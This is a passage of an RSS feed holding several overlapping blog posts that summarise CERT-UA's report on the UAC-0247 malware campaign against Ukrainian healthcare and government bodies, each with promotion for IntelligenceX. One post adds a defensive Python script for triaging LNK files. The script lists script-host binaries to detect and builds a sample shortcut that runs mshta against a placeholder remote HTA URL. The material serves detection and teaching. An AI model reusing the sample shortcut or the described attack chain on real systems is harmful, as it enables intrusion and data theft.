&lt;p&gt;The campaign focuses heavily on data exfiltration. Attackers target browser-stored credentials, cookies, and session data from Chromium-based applications. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.&lt;/p&gt;

&lt;p&gt;In addition to stealing data, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.&lt;/p&gt;

&lt;p&gt;Some instances also include cryptocurrency mining modules, suggesting a dual objective of espionage and financial gain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why Traditional Security Fails
&lt;/h2&gt;

&lt;p&gt;The use of legitimate tools, encrypted payloads, and multi-stage execution makes this campaign particularly difficult to detect. Traditional security solutions often rely on signature-based detection, which is ineffective against such advanced techniques.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; provide significant value. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; enables organizations to identify threats before they escalate.&lt;/p&gt;

&lt;p&gt;Security teams using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation Strategies
&lt;/h2&gt;

&lt;p&gt;Organizations should restrict execution of LNK, HTA, and script-based files, for example with AppLocker or Windows Defender Application Control rules that block mshta.exe, wscript.exe, and cscript.exe. Denying mshta.exe outbound network access removes the remote HTA step this chain relies on, and constraining PowerShell while enabling script block logging reduces the attack surface for loaders such as SILENTLOOP.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign demonstrates the importance of proactive cybersecurity strategies. Organizations must adopt intelligence-driven approaches to defend against increasingly sophisticated threats.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Cyber Operation Highlights Growing Threat to Critical Infrastructure</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 07:12:49 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-operation-highlights-growing-threat-to-critical-infrastructure-a4</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-operation-highlights-growing-threat-to-critical-infrastructure-a4</guid>
      <description>&lt;p&gt;The discovery of the UAC-0247 campaign underscores the increasing sophistication of cyber threats targeting critical infrastructure. Identified by CERT-UA, the campaign focuses on government and healthcare sectors, using advanced malware techniques to steal data and maintain persistent access.&lt;/p&gt;

&lt;h2&gt;
  
  
  Attack Entry Through Phishing
&lt;/h2&gt;

&lt;p&gt;The campaign begins with phishing emails designed to appear as humanitarian communications. Victims are directed to malicious websites that prompt them to download infected files.&lt;/p&gt;

&lt;h2&gt;
  
  
  Advanced Malware Execution
&lt;/h2&gt;

&lt;p&gt;The use of LNK files, HTA scripts, and process injection allows attackers to execute malware while avoiding detection.&lt;/p&gt;

&lt;h2&gt;
  
  
  Command and Control Mechanisms
&lt;/h2&gt;

&lt;p&gt;RAVENSHELL and AGINGFLY provide remote access, while SILENTLOOP ensures communication resilience.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration and Impact
&lt;/h2&gt;

&lt;p&gt;Credentials, cookies and session data from Chromium-based browsers and WhatsApp Web are extracted for espionage, and cryptocurrency miners seen in some infections point to financial gain as a secondary objective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Role of Intelligence Platforms
&lt;/h2&gt;

&lt;p&gt;&lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; helps organizations gain visibility into threats and exposed assets.&lt;/p&gt;

&lt;p&gt;Using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, teams can detect malicious activity early and strengthen defenses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;As cyber threats continue to evolve, organizations must adopt intelligence-driven security strategies to stay ahead.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Sophisticated UAC-0247 Malware Campaign Targets Ukrainian Government and Healthcare Systems</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:42:20 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/sophisticated-uac-0247-malware-campaign-targets-ukrainian-government-and-healthcare-systems-22d3</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/sophisticated-uac-0247-malware-campaign-targets-ukrainian-government-and-healthcare-systems-22d3</guid>
      <description>&lt;p&gt;The cybersecurity landscape continues to evolve as threat actors refine their techniques and expand their targets. A recent campaign identified as UAC-0247 demonstrates this evolution by targeting Ukrainian government institutions and healthcare organizations with a complex malware operation.&lt;/p&gt;

&lt;p&gt;According to CERT-UA, the campaign was active during early 2026 and involved multiple stages of infection, data theft, and persistent system compromise.&lt;/p&gt;

&lt;h2&gt;
  
  
  Social Engineering as a Primary Weapon
&lt;/h2&gt;

&lt;p&gt;The attackers rely heavily on social engineering to initiate the attack. Emails disguised as humanitarian aid proposals are sent to potential victims, encouraging them to click on embedded links.&lt;/p&gt;

&lt;p&gt;These links lead to either compromised legitimate websites or AI-generated phishing pages. By using trusted domains or highly convincing fake sites, attackers significantly increase their chances of success.&lt;/p&gt;

&lt;h2&gt;
  
  
  Multi-Layered Attack Execution
&lt;/h2&gt;

&lt;p&gt;Once the victim downloads the malicious LNK file, the attack chain begins. The file uses mshta.exe to execute a remote HTA script, which serves as a gateway for further payload delivery.&lt;/p&gt;

&lt;p&gt;The malware then injects itself into legitimate system processes, allowing it to operate discreetly. Advanced versions use encrypted payloads and custom loaders to evade detection.&lt;/p&gt;

&lt;h2&gt;
  
  
  Establishing Persistent Access
&lt;/h2&gt;

&lt;p&gt;RAVENSHELL provides remote command execution capabilities, while AGINGFLY enables full system control. SILENTLOOP ensures continuous communication with command servers.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Theft Capabilities
&lt;/h2&gt;

&lt;p&gt;The attackers target browser-stored credentials, cookies, and WhatsApp Web data. These stores are encrypted, but with keys that are available on the compromised host, so a stealer running there recovers the data rather than breaking the encryption.&lt;/p&gt;

&lt;h2&gt;
  
  
  Importance of Threat Intelligence
&lt;/h2&gt;

&lt;p&gt;Solutions like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; help organizations identify exposed infrastructure and malicious domains.&lt;/p&gt;

&lt;p&gt;With &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can proactively detect and mitigate threats before they cause damage.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign highlights the need for proactive cybersecurity measures and continuous monitoring.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Multi-Stage Cyberattack Campaign UAC-0247 Targets Ukraine’s Public Infrastructure</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:35:18 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/multi-stage-cyberattack-campaign-uac-0247-targets-ukraines-public-infrastructure-1mm4</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/multi-stage-cyberattack-campaign-uac-0247-targets-ukraines-public-infrastructure-1mm4</guid>
      <description>&lt;p&gt;A newly identified cyber campaign known as UAC-0247 has brought renewed attention to the growing risks faced by government and healthcare systems in conflict-affected regions. According to findings released by CERT-UA, this operation specifically targeted municipal authorities, clinics, and emergency healthcare providers across Ukraine with a sophisticated chain of malware designed for data theft and long-term persistence.&lt;/p&gt;

&lt;p&gt;The campaign was observed between March and April 2026 and reflects a broader trend in modern cyber operations: combining psychological manipulation with technically advanced malware frameworks. Although the threat actor behind UAC-0247 has not been definitively identified, the complexity of the tools and techniques suggests a well-organized and resourceful adversary.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing Strategy Designed for High Success Rates
&lt;/h2&gt;

&lt;p&gt;The attack begins with a carefully crafted phishing email disguised as a humanitarian aid proposal. This theme is not accidental. In regions dealing with crisis conditions, such messaging increases the likelihood that recipients will open emails and interact with embedded links.&lt;/p&gt;

&lt;p&gt;Once clicked, the link directs the victim to either a compromised legitimate website or a fake page generated using artificial intelligence tools. In scenarios involving legitimate websites, attackers exploit cross-site scripting vulnerabilities to inject malicious scripts. This approach allows them to maintain a sense of trust while delivering harmful content.&lt;/p&gt;

&lt;p&gt;The end goal at this stage is simple: convince the user to download a malicious file disguised as something legitimate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Execution Mechanism and Malware Deployment
&lt;/h2&gt;

&lt;p&gt;After interacting with the malicious page, the victim downloads a Windows shortcut file (LNK). While seemingly harmless, this file acts as the launchpad for the attack. When executed, it triggers the Windows utility “mshta.exe,” which is used to run a remote HTML Application (HTA).&lt;/p&gt;

&lt;p&gt;The HTA file serves as both a distraction and a delivery mechanism. It displays a decoy interface to the user while quietly downloading and executing additional malicious payloads in the background.&lt;/p&gt;

&lt;p&gt;The payload then injects shellcode into legitimate processes such as RuntimeBroker.exe. By running inside a trusted system process, the malware avoids raising suspicion and bypasses many detection methods that key on the image name of the process doing the work.&lt;/p&gt;

&lt;p&gt;In more advanced cases, the attackers employ a two-stage loader system. The second stage is implemented using a custom executable format capable of handling structured code execution and dynamic linking. The payload is encrypted and compressed, making reverse engineering and detection significantly more challenging.&lt;/p&gt;

&lt;h2&gt;
  
  
  Maintaining Access and Command Control
&lt;/h2&gt;

&lt;p&gt;Once the system is compromised, the attackers maintain access through a reverse shell known as RAVENSHELL. This tool opens a connection from the infected machine back to the attacker’s command server, allowing remote execution of commands via standard system utilities such as cmd.exe.&lt;/p&gt;

&lt;p&gt;Alongside this, the malware family AGINGFLY is deployed. Developed in C#, it provides extensive control over the infected system, enabling attackers to execute commands, log keystrokes, transfer files, and deploy additional malware.&lt;/p&gt;

&lt;p&gt;A PowerShell-based component named SILENTLOOP further strengthens the attack. It retrieves command-and-control server addresses from Telegram channels and includes fallback mechanisms to maintain communication even if primary servers are disrupted.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration and Network Expansion
&lt;/h2&gt;

&lt;p&gt;The primary objective of UAC-0247 is data theft. Attackers focus on extracting sensitive information from Chromium-based browsers, including saved credentials, cookies, and session tokens. They also deploy tools designed to access WhatsApp Web data, enabling them to capture private conversations.&lt;/p&gt;

&lt;p&gt;In addition to data exfiltration, the attackers perform reconnaissance and lateral movement within compromised networks. Tools used in the campaign allow for network scanning, tunneling, and expansion into additional systems.&lt;/p&gt;

&lt;p&gt;Some instances of the attack also include cryptocurrency mining modules, suggesting that financial gain may be a secondary objective.&lt;/p&gt;

&lt;h2&gt;
  
  
  Detection Challenges in Modern Threats
&lt;/h2&gt;

&lt;p&gt;The stealthy nature of this campaign makes it particularly difficult to detect. By using legitimate system tools and encrypting payloads, attackers can operate under the radar of traditional security solutions.&lt;/p&gt;

&lt;p&gt;This highlights the importance of visibility and intelligence in modern cybersecurity. Platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; provide organizations with the ability to identify exposed assets, monitor malicious infrastructure, and track threat activity across multiple sources.&lt;/p&gt;

&lt;p&gt;By leveraging &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can gain insights into attacker behavior, detect suspicious domains, and proactively mitigate risks before they escalate.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation and Defense Strategies
&lt;/h2&gt;

&lt;p&gt;To reduce exposure to such threats, organizations should restrict the execution of file types commonly used in attacks, including LNK, HTA, and JavaScript files. Limiting the use of built-in utilities like mshta.exe and PowerShell can also reduce the attack surface.&lt;/p&gt;

&lt;p&gt;User awareness training remains critical, as phishing continues to be one of the most effective entry points for attackers.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign is a clear example of how cyber threats are evolving in both scale and sophistication. Organizations must adopt proactive security strategies, combining visibility, intelligence, and strong internal controls to defend against such advanced attacks.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Malware Operation Targets Critical Ukrainian Infrastructure</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:29:13 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-malware-operation-targets-critical-ukrainian-infrastructure-11m0</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-malware-operation-targets-critical-ukrainian-infrastructure-11m0</guid>
      <description>&lt;p&gt;A recent disclosure from CERT-UA has exposed a coordinated cyber operation targeting Ukraine’s public sector. The campaign, labeled UAC-0247, focuses on compromising healthcare and government systems through a combination of phishing, malware deployment, and data exfiltration techniques.&lt;/p&gt;

&lt;p&gt;This operation underscores how attackers are shifting towards hybrid attack models that blend social engineering with technical exploitation.&lt;/p&gt;

&lt;h2&gt;
  
  
  Phishing as the Entry Vector
&lt;/h2&gt;

&lt;p&gt;The campaign starts with emails posing as humanitarian aid communications. These messages include links that redirect victims to either compromised websites or AI-generated phishing pages.&lt;/p&gt;

&lt;p&gt;The goal is to trick users into downloading a malicious LNK file, which initiates the attack chain.&lt;/p&gt;

&lt;h2&gt;
  
  
  Multi-Stage Malware Execution
&lt;/h2&gt;

&lt;p&gt;The LNK file triggers an HTA script executed via mshta.exe. While the user sees a harmless interface, the system is being infected in the background.&lt;/p&gt;

&lt;p&gt;The malware injects code into legitimate processes, ensuring stealth. Advanced versions deploy encrypted payloads through a custom loader.&lt;/p&gt;

&lt;h2&gt;
  
  
  Command and Control Infrastructure
&lt;/h2&gt;

&lt;p&gt;RAVENSHELL establishes remote access, while AGINGFLY provides full control over the infected system. SILENTLOOP ensures resilience by retrieving updated C2 addresses from Telegram channels and falling back to alternates if the primary servers go down.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Exfiltration Techniques
&lt;/h2&gt;

&lt;p&gt;Attackers extract browser credentials, cookies and WhatsApp Web data. Dedicated tools decrypt these locally encrypted stores on the host and pull out the sensitive contents.&lt;/p&gt;

&lt;h2&gt;
  
  
  Role of Threat Intelligence
&lt;/h2&gt;

&lt;p&gt;Platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; help organizations identify exposed infrastructure and malicious domains.&lt;/p&gt;

&lt;p&gt;Using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can proactively detect threats and reduce attack surfaces.&lt;/p&gt;

&lt;h2&gt;
  
  
  Final Thoughts
&lt;/h2&gt;

&lt;p&gt;The campaign demonstrates the need for proactive cybersecurity strategies and better visibility into attack infrastructure.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>Advanced Malware Campaign Hits Ukrainian Healthcare and Government Networks</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:26:58 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/advanced-malware-campaign-hits-ukrainian-healthcare-and-government-networks-3c33</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/advanced-malware-campaign-hits-ukrainian-healthcare-and-government-networks-3c33</guid>
      <description>&lt;p&gt;A newly uncovered cyber campaign attributed to the threat cluster UAC-0247 has drawn serious attention after targeting Ukrainian government bodies and healthcare institutions. The findings, disclosed by CERT-UA, reveal a multi-layered attack chain designed to infiltrate systems, establish persistence, and extract sensitive data from both browsers and communication platforms like WhatsApp.&lt;/p&gt;

&lt;p&gt;The campaign was active between March and April 2026, and while attribution remains uncertain, the level of sophistication strongly indicates a well-resourced threat actor. The operation demonstrates a growing trend in cyber warfare where attackers combine social engineering, legitimate tools, and advanced malware to bypass traditional defenses.&lt;/p&gt;

&lt;h2&gt;
  
  
  Initial Access Through Social Engineering
&lt;/h2&gt;

&lt;p&gt;The attack begins with a phishing email disguised as a humanitarian aid proposal. This tactic is particularly effective in high-stress environments, as it exploits urgency and trust.&lt;/p&gt;

&lt;p&gt;Recipients are directed to a link that leads either to a compromised legitimate website or a convincingly crafted fake page generated with AI tools. In some cases, attackers leverage cross-site scripting vulnerabilities to inject malicious content into trusted domains, increasing the likelihood of user interaction.&lt;/p&gt;

&lt;p&gt;Once the victim engages, they are prompted to download a Windows shortcut file (LNK), which acts as the entry point for the infection.&lt;/p&gt;

&lt;h2&gt;
  
  
  Execution Chain and Payload Deployment
&lt;/h2&gt;

&lt;p&gt;Opening the LNK file triggers the execution of an HTA file via “mshta.exe,” a legitimate Windows utility frequently abused in malware campaigns. The HTA displays a decoy interface to distract the user while silently downloading additional payloads.&lt;/p&gt;

&lt;p&gt;The next stage involves injecting shellcode into trusted processes such as RuntimeBroker.exe. This technique allows the malware to operate under the guise of legitimate system activity, making detection significantly more difficult.&lt;/p&gt;

&lt;p&gt;More advanced variants use a two-stage loader architecture, with the second stage built using a custom executable format. The payload is encrypted and compressed, further complicating forensic analysis.&lt;/p&gt;

&lt;h2&gt;
  
  
  Establishing Persistence and Remote Control
&lt;/h2&gt;

&lt;p&gt;The attackers deploy a reverse shell known as RAVENSHELL, which establishes a persistent connection with a command-and-control server. This allows them to execute commands remotely using standard tools like cmd.exe.&lt;/p&gt;

&lt;p&gt;In parallel, the malware family AGINGFLY is deployed. Written in C#, it communicates with attackers via WebSockets and enables a wide range of malicious actions, including command execution, file exfiltration, and keylogging.&lt;/p&gt;

&lt;p&gt;A PowerShell component named SILENTLOOP enhances resilience by dynamically retrieving command-and-control infrastructure from Telegram channels. This ensures the malware remains operational even if primary servers are taken down.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Theft and Network Expansion
&lt;/h2&gt;

&lt;p&gt;The primary objective of the campaign is data exfiltration. Attackers target credentials, browser cookies, and session data from Chromium-based browsers. They also deploy tools capable of extracting WhatsApp Web data, giving them access to private communications.&lt;/p&gt;

&lt;p&gt;Additional tools support lateral movement, allowing attackers to expand their presence within compromised networks. Some deployments also include cryptocurrency mining modules, indicating a potential financial motive alongside intelligence gathering.&lt;/p&gt;

&lt;h2&gt;
  
  
  Why These Attacks Are Hard to Detect
&lt;/h2&gt;

&lt;p&gt;The use of legitimate system utilities, encrypted payloads, and multi-stage execution makes this campaign particularly stealthy. Traditional security tools often struggle to differentiate between normal and malicious activity in such scenarios.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; become essential. By offering visibility into exposed assets, malicious domains, and attacker infrastructure, &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; enables organizations to detect threats early in the attack lifecycle.&lt;/p&gt;

&lt;p&gt;Security teams using &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; can monitor suspicious activity, analyze infrastructure patterns, and correlate threat intelligence across multiple sources.&lt;/p&gt;

&lt;h2&gt;
  
  
  Mitigation Strategies
&lt;/h2&gt;

&lt;p&gt;Organizations should restrict execution of LNK, HTA, and script-based files, and limit the use of tools like mshta.exe and PowerShell. Continuous monitoring and user awareness training are also critical.&lt;/p&gt;

&lt;h2&gt;
  
  
  Conclusion
&lt;/h2&gt;

&lt;p&gt;The UAC-0247 campaign highlights the evolving nature of cyber threats. Organizations must adopt proactive, intelligence-driven security strategies to defend against such sophisticated attacks.&lt;/p&gt;

</description>
    </item>
    <item>
      <title>UAC-0247 Cyber Campaign Targets Ukrainian Healthcare and Government Systems</title>
      <dc:creator>Abhay Negi</dc:creator>
      <pubDate>Sat, 18 Apr 2026 06:22:27 +0000</pubDate>
      <link>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-campaign-targets-ukrainian-healthcare-and-government-systems-18dl</link>
      <guid>https://dev.to/abhay_negi_3025afed85d9a4/uac-0247-cyber-campaign-targets-ukrainian-healthcare-and-government-systems-18dl</guid>
      <description>&lt;p&gt;Ukraine’s national cyber defense authority, CERT-UA, has revealed details of a coordinated cyber operation that targeted government institutions and healthcare organizations, including clinics and emergency response units. The campaign, tracked as UAC-0247, focuses on deploying malware capable of extracting sensitive data from Chromium-based browsers and WhatsApp sessions.&lt;/p&gt;

&lt;p&gt;The activity was observed during March and April 2026. While the group behind the operation has not yet been officially identified, the techniques used suggest a well-organized threat actor with a clear objective: gaining access to sensitive information and maintaining persistent control over compromised systems.&lt;/p&gt;

&lt;h2&gt;
  
  
  How the Attack Begins
&lt;/h2&gt;

&lt;p&gt;The entry point for the attack is a carefully crafted phishing email. These emails are disguised as humanitarian aid proposals, a tactic likely chosen to exploit trust and urgency among recipients.&lt;/p&gt;

&lt;p&gt;The message contains a link that directs victims to either a legitimate website that has been compromised or a fake page created using AI-generated content. In cases where legitimate websites are used, attackers exploit cross-site scripting vulnerabilities to inject malicious elements. Regardless of the method, the outcome remains the same — convincing the user to download a malicious file.&lt;/p&gt;

&lt;h2&gt;
  
  
  From Download to Execution
&lt;/h2&gt;

&lt;p&gt;Once the victim interacts with the malicious page, they are prompted to download a Windows shortcut file (LNK). Opening this file triggers the execution of a remote HTML Application (HTA) via the built-in Windows tool “mshta.exe.”&lt;/p&gt;

&lt;p&gt;The HTA file is designed to distract the user by displaying a decoy interface while it quietly initiates the next stage of the attack. Behind the scenes, it downloads a binary payload that injects malicious code into legitimate system processes such as RuntimeBroker.exe. This approach helps the malware remain hidden while carrying out its operations.&lt;/p&gt;

&lt;p&gt;CERT-UA has also identified more advanced attack chains where a two-stage loader is used. The second stage is implemented in a custom executable format that supports structured code execution and dynamic imports. To further complicate analysis, the final payload is compressed and encrypted.&lt;/p&gt;
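&lt;p&gt;As an added example that is not part of CERT-UA's report or of this article, the Python below triages a shortcut file statically for the traits just described. It parses the ShellLinkHeader and StringData section of the MS-SHLLINK format, recovers the target's relative path, arguments, icon and window mode, and flags a script-host target, a URL in the arguments (mshta.exe fetching a remote HTA), a minimised window and a decoy icon. The sample shortcut is constructed inline by a small builder, and the hostname in it is a placeholder rather than an indicator from the campaign. The LinkTargetIDList and LinkInfo blocks are skipped over by size, so a shortcut whose target is carried only in the ID list yields no path here.&lt;/p&gt;

```python
"""Static triage of Windows shortcut (.lnk) files for the LNK-to-mshta.exe pattern.

Added illustration, not code from CERT-UA or from the campaign.  Only the
ShellLinkHeader and the StringData section of MS-SHLLINK are parsed; the
LinkTargetIDList and LinkInfo blocks are skipped over by size, so a shortcut
that carries its target solely in the ID list yields no path here.
"""

LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
SW_SHOWMINNOACTIVE = 7   # ShowCommand value that keeps the script host's window minimised
# LinkFlags bit and the StringData field it announces, in on-disk order.
STRING_FIELDS = ((2, "name"), (3, "relative_path"), (4, "working_dir"),
                 (5, "arguments"), (6, "icon_location"))
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "wscript.exe",
                "cscript.exe", "cmd.exe", "rundll32.exe", "regsvr32.exe"}


def _flag(flags, bit):
    return (flags >> bit) % 2 == 1


def _take(data, off, n):
    """Return data[off:off+n] and the new offset, refusing truncated input."""
    chunk = data[off:off + n]
    if len(chunk) != n:
        raise ValueError("truncated shell link at offset %d" % off)
    return chunk, off + n


def parse_lnk(data):
    """Return header fields plus whichever StringData entries LinkFlags says exist."""
    if data[:4] != b"L\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or CLSID")
    flags = int.from_bytes(data[20:24], "little")
    info = {"flags": flags, "show_command": int.from_bytes(data[60:64], "little")}
    off = 76                                  # fixed ShellLinkHeader size
    if _flag(flags, 0):                       # HasLinkTargetIDList: u16 IDListSize, then the list
        raw, off = _take(data, off, 2)
        _, off = _take(data, off, int.from_bytes(raw, "little"))
    if _flag(flags, 1):                       # HasLinkInfo: u32 LinkInfoSize counts itself
        raw, _ = _take(data, off, 4)
        _, off = _take(data, off, int.from_bytes(raw, "little"))
    unicode = _flag(flags, 7)                 # IsUnicode selects UTF-16LE over the ANSI code page
    for bit, field in STRING_FIELDS:
        if _flag(flags, bit):
            raw, off = _take(data, off, 2)    # CountCharacters; the string has no terminator
            count = int.from_bytes(raw, "little")
            raw, off = _take(data, off, count * 2 if unicode else count)
            info[field] = raw.decode("utf-16-le" if unicode else "cp1252")
    return info


def triage_lnk(data):
    """Return the suspicious traits found, in a fixed order; an empty list means none matched."""
    info = parse_lnk(data)
    target = info.get("relative_path", "").replace("/", "\\").rsplit("\\", 1)[-1].lower()
    args = info.get("arguments", "").lower()
    icon = info.get("icon_location", "").lower().split(",")[0]   # drop the ",index" suffix
    findings = []
    if target in SCRIPT_HOSTS:
        findings.append("lolbin:" + target)
    if "http://" in args or "https://" in args:
        findings.append("remote_url")         # mshta.exe fetches and runs the HTA from the web
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        findings.append("hidden_window")
    if icon and target and not icon.endswith(target):
        findings.append("icon_mismatch")      # decoy document icon on a script-host target
    return findings


def build_lnk(relative_path, arguments="", icon_location="", show_command=1):
    """Assemble a minimal Unicode shell link; a test fixture, not a sample from the campaign."""
    values = {"relative_path": relative_path, "arguments": arguments, "icon_location": icon_location}
    flags, body = 2 ** 7, b""                 # IsUnicode, plus one bit per populated string
    for bit, field in STRING_FIELDS:
        text = values.get(field, "")
        if text:
            flags = flags + 2 ** bit
            body = body + len(text).to_bytes(2, "little") + text.encode("utf-16-le")
    # HeaderSize, CLSID, LinkFlags, FileAttributes, three FILETIMEs, FileSize+IconIndex,
    # ShowCommand, HotKey+Reserved1+Reserved2+Reserved3: 76 bytes in total.
    header = (b"L\x00\x00\x00" + LNK_CLSID + flags.to_bytes(4, "little") + bytes(4)
              + bytes(24) + bytes(8) + show_command.to_bytes(4, "little") + bytes(12))
    return header + body


# Constructed samples: the chain the article describes, and an ordinary shortcut.
SAMPLE_MALICIOUS = build_lnk("..\\..\\..\\Windows\\System32\\mshta.exe",
                             "https://aid-proposal.example/proposal.hta",   # placeholder, not an IOC
                             "%SystemRoot%\\System32\\shell32.dll,1",
                             show_command=SW_SHOWMINNOACTIVE)
SAMPLE_BENIGN = build_lnk("..\\..\\Windows\\notepad.exe", icon_location="..\\..\\Windows\\notepad.exe")

if __name__ == "__main__":
    for label, blob in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        print(label, triage_lnk(blob) or "clean")
```

&lt;p&gt;To use it on a shortcut received by mail, read the file's bytes and pass them to triage_lnk(). A clean shortcut returns an empty list; a ValueError means the file is not a shell link at all or was truncated, both of which deserve a second look on their own.&lt;/p&gt;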

&lt;h2&gt;
  
  
  Establishing Control Over the System
&lt;/h2&gt;

&lt;p&gt;A key component of the attack is the deployment of a reverse shell tool referred to as RAVENSHELL. This tool creates a connection between the infected machine and a remote command server, allowing attackers to execute commands using standard utilities like cmd.exe.&lt;/p&gt;

&lt;p&gt;Alongside this, the attackers deploy a malware family known as AGINGFLY and a PowerShell-based component called SILENTLOOP. AGINGFLY is developed in C# and provides extensive control over the infected system. It communicates with its command server via WebSockets and supports a wide range of actions, including command execution, file transfers, and keylogging.&lt;/p&gt;

&lt;p&gt;SILENTLOOP enhances the reliability of the attack by dynamically retrieving command-and-control server addresses from Telegram channels. It also includes fallback mechanisms to ensure communication persists even if primary channels are disrupted.&lt;/p&gt;

&lt;h2&gt;
  
  
  Data Theft and Lateral Movement
&lt;/h2&gt;

&lt;p&gt;The primary objective of the campaign is data exfiltration. Attackers focus on extracting credentials, browser data, and communication records. To achieve this, they deploy tools that decrypt the locally encrypted password and cookie stores of Chromium-based applications.&lt;/p&gt;

&lt;p&gt;They also use specialized utilities to access WhatsApp Web data, allowing them to capture user conversations. Additional tools enable network scanning, tunneling, and lateral movement within compromised environments, increasing the overall impact of the intrusion.&lt;/p&gt;

&lt;p&gt;In some cases, cryptocurrency mining tools have also been observed, indicating that financial gain may be an additional motive behind the campaign.&lt;/p&gt;

&lt;p&gt;There is also evidence suggesting that individuals connected to Ukraine’s defense sector have been targeted. In such instances, malicious files were distributed through messaging platforms, further expanding the reach of the campaign.&lt;/p&gt;

&lt;h2&gt;
  
  
  Challenges in Detection
&lt;/h2&gt;

&lt;p&gt;This campaign is particularly difficult to detect due to its use of legitimate system tools and multi-stage execution techniques. By blending malicious activity with normal system behavior, attackers are able to bypass traditional security defenses.&lt;/p&gt;

&lt;p&gt;This is where platforms like &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; become valuable. &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt; provides visibility into exposed assets, malicious infrastructure, and threat patterns, helping organizations identify risks before they escalate into full-scale incidents.&lt;/p&gt;

&lt;p&gt;By leveraging &lt;a href="https://intelligencex.org/" rel="noopener noreferrer"&gt;IntelligenceX&lt;/a&gt;, security teams can monitor suspicious domains, analyze attacker infrastructure, and correlate intelligence across multiple data sources. This proactive approach is essential for detecting advanced threats that rely on stealth and persistence.&lt;/p&gt;

&lt;h2&gt;
  
  
  Defensive Recommendations
&lt;/h2&gt;

